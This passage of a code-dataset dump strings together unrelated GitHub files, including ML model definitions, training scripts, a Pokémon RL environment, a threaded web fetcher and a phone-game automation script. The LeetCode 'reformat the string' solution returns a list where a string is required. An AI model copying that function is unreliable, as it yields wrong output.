It will train for 20 epochs and then save \n the generated model.\n \"\"\")\n train_parser.add_argument(\"images_directory\", type=Path, metavar=\"dataset\",\n help=\"Path to the directory where the dataset is stored\")\n train_parser.add_argument(\"save_path\", type=Path, metavar=\"output\",\n help=\"Path where the trained model should be saved to\")\n train_parser.set_defaults(func=training.run)\n\n benchmark_parser = subparsers.add_parser(\"benchmark\",\n help=\"Perform a benchmark using a model that is being served with the \"\n \"'serve' command\",\n description=\"Perform a benchmark using a model that is being served with \"\n \"the 'serve' command\")\n benchmark_parser.add_argument(\"input_img_path\", type=Path, metavar=\"image\",\n help=\"Path of an image to use for benchmarking, must be 128x128 pixels\")\n benchmark_parser.set_defaults(func=benchmark.run)\n\n serve_parser = subparsers.add_parser(\"serve\",\n help=\"Serve a saved model using the tensorflow/serving docker container.\",\n description=\"Serve a saved model using the tensorflow/serving docker container.\")\n serve_parser.add_argument(\"model_path\", type=Path, metavar=\"model\",\n help=\"Path to the saved model to be served, must be absolute\")\n serve_parser.set_defaults(func=serving.run)\n\n visualize_parser = subparsers.add_parser(\"visualize\",\n help=\"Create a collage of images including the labels.\",\n description=\"Create a collage of images including the labels.\")\n visualize_parser.add_argument(\"images_directory\", type=Path, metavar=\"images\",\n help=\"Path to the directory where the images are stored\")\n visualize_parser.add_argument(\"save_path\", type=Path, metavar=\"output\",\n help=\"Path where the image should be saved to\")\n visualize_parser.set_defaults(func=utility.visualize_dataset)\n\n args = parser.parse_args()\n\n if \"func\" not in args:\n parser.print_help()\n else:\n args_dict = vars(args)\n func = args_dict.pop(\"func\")\n func(**args_dict)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GeorgSchenzel/pose-detector","sub_path":"src/pose_detector/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75255254248","text":"\"\"\"Defines utility functions.\"\"\"\nimport tensorflow as tf\n\n\ndef get_positional_encoding(batch_size, seq_len, hidden_size, reverse=False):\n \"\"\"Creates a tensor that encodes positional information.\n\n Args:\n batch_size: int scalar tensor, batch size. \n seq_len: int scalar tensor, sequence length.\n hidden_size: int scalar, the hidden size of continuous representation.\n reverse: bool, whether to reverse the sequence. 
Defaults to False.\n\n Returns:\n positional_encoding: float tensor of shape [batch_size, seq_len, hidden_size], the \n tensor that encodes positional information.\n \"\"\"\n distances = tf.cast(tf.range(seq_len), 'float32')\n if reverse:\n distances = distances[::-1]\n inverse_frequencies = 1 / (10000 ** (tf.range(0, hidden_size, 2.0) /\n hidden_size))\n positional_encoding = tf.einsum('i,j->ij', distances, inverse_frequencies)\n positional_encoding = tf.concat([tf.sin(positional_encoding),\n tf.cos(positional_encoding)], axis=1)\n positional_encoding = tf.tile(positional_encoding[tf.newaxis], [batch_size, 1, 1])\n return positional_encoding\n\n\ndef get_look_ahead_mask(q_seq_len, m_seq_len):\n \"\"\"Creates a tensor to mask out future tokens that should not be attended to.\n\n Given query sequence of length `q_seq_len`, and memory sequence of length\n `m_seq_len`, the mask would be a `q_seq_len x (m_seq_len + q_seq_len)` matrix\n that looks like this:\n\n 0, ... | 0, 1, 1, ..., 1 \n 0, ... | 0, 0, 1, ..., 1\n\n ... ...\n\n 0, ... | 0, 0, 0, ..., 1\n 0, ... | 0, 0, 0, ..., 0\n\n where the submatrix to the left of `|` corresponds to the memory sequence, \n while the submatrix to the right corresponds to the query sequence.\n\n Args:\n q_seq_len: int scalar tensor, query sequence length.\n m_seq_len: int scalar tensor, memory sequence length.\n\n Returns:\n look_ahead_mask: float tensor of shape [1, 1, q_seq_len, \n m_seq_len + q_seq_len].\n \"\"\"\n mask = tf.ones([q_seq_len, q_seq_len])\n mask_u = tf.linalg.band_part(mask, 0, -1)\n mask_dia = tf.linalg.band_part(mask, 0, 0)\n mask_pad = tf.zeros([q_seq_len, m_seq_len])\n look_ahead_mask = tf.concat([mask_pad, mask_u - mask_dia], 1)\n look_ahead_mask = look_ahead_mask[tf.newaxis, tf.newaxis, :, :]\n return look_ahead_mask\n\n\ndef cache_memory(memory, inputs, m_seq_len=None):\n \"\"\"Cache the memory for the next segment.\n\n Args:\n memory: float tensor of shape [batch_size, m_seq_len, hidden_size], memory\n for the current segment.\n inputs: float tensor of shape [batch_size, q_seq_len, hidden_size], \n input sequences.\n m_seq_len: int scalar, num of time steps to be cached.\n\n Returns:\n new_memory: float tensor of shape [batch_size, m_seq_len, hidden_size],\n memory cached for the next segment.\n \"\"\"\n if m_seq_len is None:\n m_seq_len = tf.shape(memory)[1]\n new_memory = tf.stop_gradient(\n tf.concat([memory, inputs], axis=1)[:, -m_seq_len:])\n return new_memory\n","repo_name":"chao-ji/tf-transformerxl-language-model","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20052549894","text":"'''You are given an alphanumeric string s. (Alphanumeric string is a string consisting of lowercase English letters and digits).\n\nYou have to find a permutation of the string where no letter is followed by another letter and no digit is followed by another digit. That is, no two adjacent characters have the same type.\n\nReturn the reformatted string or return an empty string if it is impossible to reformat the string.\n\nExample 1:\n\nInput: s = \"a0b1c2\"\nOutput: \"0a1b2c\"\nExplanation: No two adjacent characters have the same type in \"0a1b2c\". 
\"a0b1c2\", \"0a1b2c\", \"0c2a1b\" are also valid permutations.'''\n\n# TC = O(n)\ndef reformat(self, s: str) -> str:\n a = [c for c in s if c.isalpha()]\n b = [c for c in s if c.isdigit()]\n if len(a) < len(b): a, b = b, a\n if len(a) - len(b) > 1: return \"\"\n \n rv = []\n while a:\n rv.append(a.pop())\n if b: rv.append(b.pop())\n return rv\n ","repo_name":"DEVHrishi/DSA--PYTHON--SQL","sub_path":"String/Easy/Reformat The String.py","file_name":"Reformat The String.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20840924225","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torch.nn.functional as F\n\nimport utilities as u\n\n\nclass BaselineRNN(nn.Module):\n '''\n Model to produce kinematics to reach to a randomly placed target.\n\n '''\n\n def __init__(self, inp_size=3, n_neurons=128, out_size=6, rnn_nonlinearity = 'relu',dropout_p=.3):\n '''\n Initialize layers to reuse during each timestep\n\n ----------\n Parameters\n ----------\n inp_size : int\n number of input timeseries, defaults to 3 (target x, target y, go cue)\n n_neurons : int\n number of neurons in each hidden layers\n\n '''\n super(BaselineRNN, self).__init__()\n\n\n\n # input -> ReLU RNN -> Dropout ->Linear -> ReLU -> Linear -> Kinematics (accx, accy, velx,vely,posx,posy)\n self.inp_size = inp_size\n self.out_size = out_size\n self.n_neurons = n_neurons\n\n # Recurrent layer\n self.rnn = nn.RNNCell(input_size=inp_size,hidden_size=n_neurons,nonlinearity=rnn_nonlinearity)\n\n # Output layer\n self.out_layer = nn.Sequential(nn.Dropout(p=dropout_p),nn.Linear(n_neurons, n_neurons), nn.ReLU(),nn.Linear(n_neurons, out_size))\n\n\n\n\n def forward(self, inp, h_old):\n \"\"\"\n Parameters\n ----------\n inp : torch.tensor, shape (batch_size,self.inp_size)\n Target position and go cue\n h_old : torch.tensor, shape (batch_size, self.n_neurons)\n previous hidden state of recurrent layer\n\n Returns\n -------\n kin : torch.tensor\n has shape (self.out_size,) corresponding to x and y acceleration.\n h_new : torch.tensor\n has shape (n_neurons,). 
new hidden state\n \"\"\"\n\n\n # New hidden state\n h_new=self.rnn(inp,h_old)\n # Collect RNN output\n kin = self.out_layer(h_new)\n\n return kin, h_new\n\n\nclass RNN_Recursive(nn.Module):\n '''\n Network setup for recurrent control of the cursor\n '''\n def __init__(self, inp_size=3, n_neurons=128, out_size=2, rnn_type = 'relu',dropout_p=.3):\n '''\n Parameters\n ---------\n inp : int\n number of inputs, defaults to 3 (target locations and go cue)\n n_neurons: int\n number of units in hidden layers\n out_size: int\n number of variables to return\n rnn_type: string ['relu','tanh','gru','lstm']\n\n '''\n super(RNN_Recursive, self).__init__()\n\n\n self.inp_size = inp_size\n self.out_size = out_size\n self.n_neurons = n_neurons\n self.rnn_type = rnn_type\n\n\n # Input layers\n # Linear -> ReLU -> Dropout -> Linear -> ReLU -> Dropout\n self.in_layer = nn.Sequential(nn.Linear(inp_size,n_neurons),nn.ReLU(),nn.Dropout(p=dropout_p),\n nn.Linear(n_neurons,n_neurons),nn.ReLU(),nn.Dropout(p=dropout_p))\n\n # Recurrent layer\n if rnn_type == \"gru\":\n self.rnn = nn.GRUCell(input_size=n_neurons,hidden_size=n_neurons)\n elif rnn_type==\"lstm\":\n raise NotImplementedError\n elif rnn_type in ['relu','tanh']:\n # the nonlinearity name is carried by rnn_type for plain RNN cells\n self.rnn = nn.RNNCell(input_size=n_neurons,hidden_size=n_neurons,nonlinearity=rnn_type)\n else:\n raise NotImplementedError\n\n # Output layers\n # Dropout -> Linear -> ReLU -> Linear -> Acc\n self.out_layer = nn.Sequential(nn.Dropout(p=.2),nn.Linear(n_neurons, n_neurons), nn.ReLU(),nn.Linear(n_neurons, out_size))\n\n\n def forward(self, inp, h_old):\n \"\"\"\n Parameters\n ----------\n inp : torch.tensor\n Hand and target positions. Has shape (7,).\n (go, hand_x, hand_y, curr_tgx, curr_tgy, next_tgx, next_tgy)\n h_old : torch.tensor\n Initial firing rates. 
Has shape (n_neurons,)\n task_info : torch.tensor\n tensor holding (go, curr_tgx, curr_tgy, next_tgx, next_tgy)\n\n Returns\n -------\n acc : torch.tensor\n has shape (2,) corresponding to x and y acceleration.\n h_new : torch.tensor\n has shape (n_neurons,), new hidden state of recurrent network\n \"\"\"\n\n x = self.in_layer(inp)\n\n # Update RNN one time step.\n h_new = self.rnn(x, h_old)\n\n # Collect RNN output (acceleration of hand).\n acc = self.out_layer(h_new)\n\n return acc, h_new\n","repo_name":"markplitt/CS230Project","sub_path":"supervised_models.py","file_name":"supervised_models.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18463975671","text":"# _*_ coding: utf-8 _*_\n\n\"\"\"\nother_threads.py by xianhu\n\"\"\"\n\nimport time\nimport queue\nimport logging\nimport threading\nimport urllib.request\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s\\t%(levelname)s\\t%(message)s\")\n\ng_url_queue = queue.Queue()\ng_save_queue = queue.Queue()\n\n\ndef url_fetch_func(name):\n \"\"\"\n url fetch function\n \"\"\"\n logging.debug(\"url_fetch_func name=%s start\", name)\n while g_url_queue.qsize() > 0 or g_save_queue.qsize() > 0:\n try:\n url = g_url_queue.get(timeout=10)\n logging.debug(\"url_fetch_func name=%s fetch_url=%s\", name, url)\n g_save_queue.put(urllib.request.urlopen(url).geturl())\n time.sleep(1)\n except:\n pass\n logging.debug(\"url_fetch_func name=%s exit\", name)\n return\n\n\ndef save_items_func(name):\n \"\"\"\n save items function\n \"\"\"\n logging.debug(\"save_items_func name=%s start\", name)\n while True:\n logging.debug(\"save_items_func name=%s save_url=%s\", name, g_save_queue.get())\n time.sleep(1)\n if g_save_queue.qsize() == 0 and g_url_queue.qsize() == 0:\n break\n logging.debug(\"save_items_func name=%s exit\", name)\n return\n\n\nif __name__ == '__main__':\n for i in range(1, 21):\n g_url_queue.put(item=\"http://zhushou.360.cn/list/index/cid/2?page=%d\" % i)\n\n threads = [threading.Thread(target=url_fetch_func, args=(str(i),)) for i in range(2)]\n threads.append(threading.Thread(target=save_items_func, args=(\"save\",)))\n\n for th in threads:\n th.setDaemon(True)\n th.start()\n\n for th in threads:\n if th.is_alive():\n th.join()\n\n exit()\n","repo_name":"Java-via/AppSpider","sub_path":"others/other_threads.py","file_name":"other_threads.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22698592502","text":"import argparse\nimport logging\nimport os\nimport re\nimport sys\n\nimport numpy as np\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport csv\n\nimport utils\nimport model.net as net\nimport model.two_labels_data_loader as two_labels_data_loader\nfrom evaluate import evaluate\nfrom train import train\nimport display_digit as display_results\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--parent_dir', default=\"C:/Users/H/Documents/Haifa Univ/Thesis/DL-Pytorch-data\", help='path to experiments and data folder. 
not for Server')\nparser.add_argument('--data_dir', default='data/two-labels/data-two-labels-big', help=\"Directory containing the destination dataset\")\nparser.add_argument('--model_dir', default='experiments/transfer_training_model/in-debug',\n help=\"Directory containing params.json\")\nparser.add_argument('--restore_file', default='best',\n help=\"Optional, name of the file in --model_dir containing weights to reload before \\\n training\") # 'best' or 'train'\n# added by me\nparser.add_argument('--model_out_dir', default='experiments/transfer_training_model/out-debug',\n help=\"Directory to write transfer results\")\n\n\ndef load_model(model_dir, restore_file):\n # reload weights from restore_file if specified\n if restore_file is not None and model_dir is not None:\n restore_path = os.path.join(model_dir, restore_file + '.pth.tar')\n logging.info(\"Restoring parameters from {}\".format(restore_path))\n utils.load_checkpoint(restore_path, model, None) # optimizer)\n return\n\n\ndef get_network_grads(net):\n weight_string = \"weight\"\n bias_string = \"bias\"\n output_gradients = []\n output_names = []\n\n parameters_names = list(net.state_dict().keys())\n j = 0\n for i in range(len(parameters_names)):\n par = parameters_names[i - j]\n is_rel_w = re.search(weight_string, par)\n is_rel_b = re.search(bias_string, par)\n if is_rel_w is None and is_rel_b is None:\n parameters_names.remove(par)\n j += 1\n\n for name, param in net.named_parameters():\n if name in parameters_names:\n all_net_grads = param.grad.data.cpu().numpy().tolist()\n flat_net_grads = []\n if isinstance(all_net_grads, (list,)):\n\n for elem in all_net_grads:\n if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n for item in elem:\n flat_net_grads.extend(item)\n elif isinstance(elem, (list,)):\n flat_net_grads.extend(elem)\n else:\n flat_net_grads.extend([elem])\n else:\n flat_net_grads = all_net_grads\n\n output_gradients.append([min(flat_net_grads), np.median(flat_net_grads), max(flat_net_grads)])\n output_names.append(name)\n\n return output_gradients, output_names\n\n\ndef collect_network_statistics(net):\n\n status_net = []\n net_grads_graph = []\n\n for param_tensor in net.state_dict():\n\n status_net.append([param_tensor,\n (net.state_dict()[param_tensor].norm()).item(),\n list(net.state_dict()[param_tensor].size())])\n\n all_net_grads = ((net.state_dict()[param_tensor]).cpu().numpy()).tolist()\n\n # if needed, flatten the list to get one min and one max\n flat_net_grads = []\n if isinstance(all_net_grads, (list,)):\n\n for elem in all_net_grads:\n if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n for item in elem:\n flat_net_grads.extend(item)\n elif isinstance(elem, (list,)):\n flat_net_grads.extend(elem)\n else:\n flat_net_grads.extend([elem])\n else:\n flat_net_grads = all_net_grads\n\n net_grads_graph.append([min(flat_net_grads), max(flat_net_grads)])\n\n return net_grads_graph\n\n\ndef after_transfer_train_and_evaluate(model, train_dataloader, dev_dataloader, optimizer, loss_fn, metrics, incorrect, correct_fn, params, model_dir, model_out_dir, restore_file):\n\n best_dev_acc = 0.0\n\n fig = display_results.create_figure()\n\n for epoch in range(params.num_epochs):\n # Run one epoch\n logging.info(\"Epoch {}/{}\".format(epoch + 1, params.num_epochs))\n\n # compute number of batches in one epoch (one full pass over the training set)\n train(model, optimizer, loss_fn, train_dataloader, metrics, params, epoch, fig, model_out_dir, losses, grayscale=True)\n\n # Evaluate for one epoch on 
validation set\n dev_metrics, incorrect_samples, correct_samples = evaluate(model, loss_fn, dev_dataloader, metrics, incorrect, correct_fn, params, epoch)\n\n dev_acc = dev_metrics['accuracy_two_labels']\n is_best = dev_acc >= best_dev_acc\n\n grads_graph, _ = get_network_grads(model)\n vals_graph = collect_network_statistics(model)\n\n grads_per_epoch.append(grads_graph)\n vals_per_epoch.append(vals_graph)\n\n\n # Save weights\n utils.save_checkpoint({'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'optim_dict': optimizer.state_dict()},\n is_best=is_best,\n checkpoint=model_out_dir)\n\n # If best_eval, best_save_path\n if is_best:\n logging.info(\"- Found new best accuracy\")\n print(\"Epoch {}/{}\".format(epoch + 1, params.num_epochs))\n print(\"- Found new best accuracy\")\n best_dev_acc = dev_acc\n print(\"accuracy is {:05.3f}\".format(best_dev_acc))\n print(\"loss is {:05.3f}\".format(dev_metrics['loss']))\n\n # Save best val metrics in a json file in the model directory\n best_json_path = os.path.join(model_out_dir, \"metrics_dev_best_weights.json\")\n utils.save_dict_to_json(dev_metrics, best_json_path, epoch + 1)\n\n best_csv_path = os.path.join(model_out_dir, \"incorrect_best_samples.csv\")\n utils.save_incorrect_to_csv(incorrect_samples, best_csv_path)\n\n # Save latest val metrics in a json file in the model directory\n last_json_path = os.path.join(model_out_dir, \"metrics_dev_last_weights.json\")\n utils.save_dict_to_json(dev_metrics, last_json_path, epoch + 1)\n\n last_csv_path = os.path.join(model_out_dir, \"incorrect_last_samples.csv\")\n utils.save_incorrect_to_csv(incorrect_samples, last_csv_path)\n\n accuracy.append(dev_acc)\n\n display_results.close_figure(fig)\n\n return\n\n\ndef plot_summary_graphs_layers(vals_to_plot, v_type, im_path):\n vals_np = np.array(vals_to_plot)\n for it in range(vals_np.shape[1]):\n val = vals_np[:, it].tolist()\n layer_indx = it // 2\n if it % 2: # odd row numbers store bias vals\n display_results.plot_graph(val, None, \"{}_layer_bias_{}\".format(v_type, layer_indx), im_path)\n print('{}_layer_bias_{} graph plotted'.format(v_type, layer_indx))\n else: # even row numbers store weight vals\n display_results.plot_graph(val, None, \"{}_layer_weight_{}\".format(v_type, layer_indx), im_path)\n print('{}_layer_weight_{} graph plotted'.format(v_type, layer_indx))\n\n return\n\n\nif __name__ == '__main__':\n\n # Load the parameters from json file\n args = parser.parse_args()\n if args.parent_dir and not torch.cuda.is_available():\n os.chdir(args.parent_dir)\n\n json_path = os.path.join(args.model_out_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n params = utils.Params(json_path)\n\n # use GPU if available\n params.cuda = torch.cuda.is_available()\n\n # # Set the random seed for reproducible experiments\n # torch.manual_seed(230)\n # if params.cuda:\n # torch.cuda.manual_seed(230)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Set the logger # for output model\n utils.set_logger(os.path.join(args.model_out_dir, 'train.log'))\n\n # Create the input data pipeline\n logging.info(\"Loading the datasets...\")\n\n # fetch dataloaders\n dataloaders = two_labels_data_loader.fetch_dataloader(['train', 'dev'], args.data_dir, params)\n train_dl = dataloaders['train']\n dev_dl = dataloaders['dev']\n\n logging.info(\"data was loaded from {}\".format(args.data_dir))\n logging.info(\"- done.\")\n\n num_of_batches = max(1, len(train_dl.dataset) // 
train_dl.batch_size)\n logging.info(\"data-set size: {}\".format(len(train_dl.dataset)))\n logging.info(\"number of batches: {}\".format(num_of_batches))\n\n # Define the model and optimizer\n model = net.NeuralNet(params).cuda() if params.cuda else net.NeuralNet(params)\n\n load_model(args.model_dir, args.restore_file)\n\n print(model)\n logging.info(\"network structure is\")\n logging.info(\"{}\".format(model))\n\n # status_before_transfer = []\n # for param_tensor in model.state_dict():\n # status_before_transfer.append([param_tensor,\n # (model.state_dict()[param_tensor].norm()).item(), list(model.state_dict()[param_tensor].size())])\n # status_before_transfer.append(((model.state_dict()[param_tensor]).cpu().numpy()).tolist())\n\n # changing last fully connected layer\n num_ftrs = model.fc4.in_features\n model.fc4 = nn.Linear(num_ftrs, 20) # 10)\n\n model = model.to(device)\n\n print(model)\n logging.info(\"network structure after transfer is\")\n logging.info(\"{}\".format(model))\n\n optimizer = torch.optim.SGD(model.parameters(), lr=params.learning_rate)\n\n # fetch loss function and metrics\n loss_fn = net.loss_fn_two_labels\n\n metrics = net.metrics\n incorrect = net.incorrect_two_labels\n correct_fn = net.correct_classification_two_labels\n\n losses = []\n accuracy = []\n grads_per_epoch = []\n vals_per_epoch = []\n\n # Train the model\n logging.info(\"Starting training for {} epoch(s)\".format(params.num_epochs))\n after_transfer_train_and_evaluate(model, train_dl, dev_dl, optimizer, loss_fn, metrics, incorrect, correct_fn, params,\n args.model_dir, args.model_out_dir, args.restore_file)\n\n # load_model(args.model_out_dir, args.restore_file)\n #\n # status_after_transfer = []\n # for param_tensor in model.state_dict():\n # status_after_transfer.append([param_tensor,\n # (model.state_dict()[param_tensor].norm()).item(), list(model.state_dict()[param_tensor].size())])\n # status_after_transfer.append(((model.state_dict()[param_tensor]).cpu().numpy()).tolist())\n #\n # filepath = os.path.join(args.model_out_dir, 'wb_ext.csv')\n # with open(filepath, \"w\", newline='') as myfile:\n # csvwr = csv.writer(myfile)\n # for elem in status_before_transfer:\n # if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n # for row in elem:\n # csvwr.writerow(row)\n # else:\n # csvwr.writerow(elem)\n # for elem_a in status_after_transfer:\n # if isinstance(elem, (list,)) and isinstance(elem[0], (list,)):\n # for row in elem:\n # csvwr.writerow(row)\n # else:\n # csvwr.writerow(elem)\n\n print('plotting graphs')\n display_results.plot_graph(losses, None, \"General Loss\", args.model_out_dir)\n print('loss graph plotted')\n display_results.plot_graph(accuracy, None, \"General dev accuracy\", args.model_out_dir)\n print('accuracy graph plotted')\n\n plot_summary_graphs_layers(grads_per_epoch, 'Grads', args.model_out_dir)","repo_name":"Hadar-Sha/Deep-Learning","sub_path":"pytorch/schi/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":11880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32590806674","text":"from asyncio import Queue\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport torch\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.battle_order import BattleOrder\nfrom poke_env.player.env_player import Gen8EnvSinglePlayer\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom 
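# --- Editor's sketch (illustration, not the author's code): the fc4 swap above
# is the usual transfer-learning head replacement -- keep the pretrained trunk
# and attach a freshly initialized linear layer sized for the new label space.
# Freezing the trunk, shown here behind a flag, is an optional variation that
# this script does NOT perform.
import torch.nn as nn

def swap_head(model, out_features, freeze_trunk=False):
    if freeze_trunk:
        for p in model.parameters():
            p.requires_grad = False  # train only the new head
    in_features = model.fc4.in_features  # assumes the net exposes a `fc4` layer
    model.fc4 = nn.Linear(in_features, out_features)  # randomly initialized head
    return model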
poke_env.server_configuration import ServerConfiguration\nfrom poke_env.teambuilder.teambuilder import Teambuilder\n\nfrom champion_league.preprocessor import Preprocessor\nfrom champion_league.reward.reward_scheme import RewardScheme\n\n\nclass RLPlayer(Gen8EnvSinglePlayer):\n _ACTION_SPACE = list(range(4 * 2 + 6))\n\n def __init__(\n self,\n preprocessor: Preprocessor,\n reward_scheme: RewardScheme,\n player_configuration: Optional[PlayerConfiguration] = None,\n *,\n avatar: Optional[int] = None,\n battle_format: str = \"gen8randombattle\",\n log_level: Optional[int] = None,\n server_configuration: Optional[ServerConfiguration] = None,\n start_timer_on_battle_start: bool = False,\n start_listening: bool = True,\n team: Optional[Union[str, Teambuilder]] = None,\n ) -> None:\n \"\"\"Player class that will act as the league. Whenever the game ends, call change_agent() to\n change the agent playing the game. Allows sampling of self-play, league-play, and exploiting\n\n Parameters\n ----------\n preprocessor: Preprocessor\n The preprocessor for the agent.\n player_configuration: Optional[PlayerConfiguration]\n Player configuration. If empty, defaults to an\n automatically generated username with no password. This option must be set\n if the server configuration requires authentication.\n avatar: Optional[int]\n Player avatar id. Optional.\n battle_format: Optional[str]\n Name of the battle format this player plays. Defaults to\n gen8randombattle.\n log_level: Optional[int]\n The player's logger level.\n server_configuration: Optional[ServerConfiguration]\n Server configuration. Defaults to Localhost Server Configuration\n start_timer_on_battle_start: bool\n Whether to start the battle timer\n start_listening: bool\n Whether to start listening to the server. Defaults to True\n team: Optional[Union[str, Teambuilder]]\n The team to use for formats requiring a team. Can be a showdown team string, a showdown\n packed team string, or a ShowdownTeam object. 
Defaults to None.\n \"\"\"\n\n super().__init__(\n player_configuration,\n avatar=avatar,\n battle_format=battle_format,\n log_level=log_level,\n server_configuration=server_configuration,\n start_timer_on_battle_start=start_timer_on_battle_start,\n start_listening=start_listening,\n team=team,\n )\n self.reward_scheme = reward_scheme\n self._max_concurrent_battles = 2\n self._battle_count_queue = Queue(2)\n self.preprocessor = preprocessor\n\n def embed_battle(self, battle: Battle) -> Dict[str, torch.Tensor]:\n \"\"\"Abstract function for embedding a battle using the chosen preprocessor\n\n Parameters\n ----------\n battle: Battle\n The raw battle data returned from Showdown!\n\n Returns\n -------\n torch.Tensor\n The battle converted into something readable by the network.\n \"\"\"\n return self.preprocessor.embed_battle(battle=battle)\n\n def compute_reward(self, battle: Battle) -> Dict[str, float]:\n \"\"\"Function for determining the reward from the current gamestate\n\n Args:\n battle: The current state of the game\n\n Returns:\n Dict[str, float]: The reward, determined by the state\n \"\"\"\n return self.reward_scheme.compute(battle)\n\n def step(\n self, action: int\n ) -> Tuple[Battle, Dict[str, float], bool, Dict[str, int]]:\n \"\"\"Function for stepping the environment\n\n Args:\n action: int\n\n Returns:\n Tuple[Battle, Dict[str, float], bool, Dict[str, int]]: obs, reward, done, info\n \"\"\"\n obs, reward, done, _ = super().step(action)\n return obs, reward, done, {\"won\": 1 if self._current_battle.won else 0}\n\n def _action_to_move(self, action: int, battle: Battle) -> BattleOrder:\n \"\"\"Converts the action index to the format readable by Showdown!\n\n Parameters\n ----------\n action: int\n The action that is to be performed\n battle: Battle\n The current gamestate\n\n Returns\n -------\n BattleOrder\n The action that is to be performed, in a format readable by Showdown!\n \"\"\"\n if (\n action < 4\n and action < len(battle.available_moves)\n and not battle.force_switch\n ):\n return self.create_order(battle.available_moves[action])\n elif 0 <= action - 4 < len(battle.available_switches):\n return self.create_order(battle.available_switches[action - 4])\n else:\n return self.choose_random_move(battle)\n\n def reset(self) -> Dict[str, torch.Tensor]:\n self.reward_scheme.reset()\n self.preprocessor.reset()\n return super().reset()\n","repo_name":"alex-nooj/champion_league","sub_path":"champion_league/env/rl_player.py","file_name":"rl_player.py","file_ext":"py","file_size_in_byte":5476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70256363690","text":"import sys\ndef get_a_float(prompt):\n\tproblem_with_input=True\n\twhile(problem_with_input):\n\t\tsys.stdout.write(prompt)\n\t\ttry:\n\t\t\tuser_entered_float = float( sys.stdin.readline() )\n\t\t\tproblem_with_input=False\n\t\texcept ValueError:\n\t\t\tsys.stdout.write(\"You must enter a number!\\n\")\n\treturn user_entered_float\n\ndef get_an_int(prompt):\n\treturn int( get_a_float(prompt) )\n\ndef average_earnings_calculator_v2():\n\ttotal_income = get_a_float(\"Enter your total income for 2020: \")\n\tnum_days_worked = get_an_int(\"Enter number of days worked in 2020: \")\n\ttry:\n\t\taverage_income_per_day = total_income / num_days_worked\n\t\tsys.stdout.write(\"You've earned an average daily income of $\"+str(average_income_per_day))\n\texcept ZeroDivisionError:\n\t\tsys.stdout.write(\"Sorry, we can't calculate the average daily 
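# --- Editor's sketch (not from the repo): _ACTION_SPACE above has 4*2 + 6 = 14
# indices, and _action_to_move (further below) reads indices 0-3 as move slots
# and 4-9 as switch slots, falling back to a random move otherwise; the
# battle.force_switch check is omitted here for brevity.
def decode_action(action, n_moves, n_switches):
    if action < 4 and action < n_moves:
        return ("move", action)
    if 0 <= action - 4 < n_switches:
        return ("switch", action - 4)
    return ("random", None)

assert decode_action(2, n_moves=4, n_switches=6) == ("move", 2)
assert decode_action(5, n_moves=4, n_switches=6) == ("switch", 1)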
earnings!\")\n\naverage_earnings_calculator_v2()\n","repo_name":"AshOConnor/Python","sub_path":"average_earning_calculations.py","file_name":"average_earning_calculations.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17508396210","text":"import cv2\nimport time\nfrom typing import Optional\n\nimport numpy as np\n\nfrom definition import Tasks, Actions\nfrom predict import Predictor\nimport scrcpy\n\n\ndef visualize_frame(frame, point):\n frame = frame.copy()\n cv2.circle(frame, point, 3, (0, 0, 255), -1)\n cv2.imshow(\"viz\", frame)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n predictor = Predictor()\n client = scrcpy.Client(max_width=1280, max_fps=10)\n client.start(True)\n\n tasks = [\n Tasks.Home,\n Tasks.Email,\n Tasks.Home,\n Tasks.FriendFoundation,\n Tasks.Home,\n Tasks.Shopping,\n Tasks.Home,\n Tasks.RecentBattle\n ] + [Tasks.Battle] * 6 + [\n Tasks.Home,\n Tasks.Task,\n Tasks.Home\n ]\n\n last_frame: Optional[np.ndarray] = None\n finish_count = 0\n\n while len(tasks) > 0:\n if client.last_frame is None or (client.last_frame == last_frame).all():\n continue\n last_frame = client.last_frame\n\n action, score, (x, y) = predictor.predict(last_frame, tasks[0].value)\n # visualize_frame(last_frame, (x, y))\n print(action, score)\n if action == Actions.Finish:\n print(f\"{tasks[0]} 已完成\")\n finish_count += 1\n if finish_count >= 3:\n tasks.pop(0)\n else:\n finish_count = 0\n if action == Actions.Touch:\n print(tasks[0], action, score, (x, y))\n client.control.touch(x, y, scrcpy.ACTION_DOWN)\n client.control.touch(x, y, scrcpy.ACTION_UP)\n time.sleep(1)\n 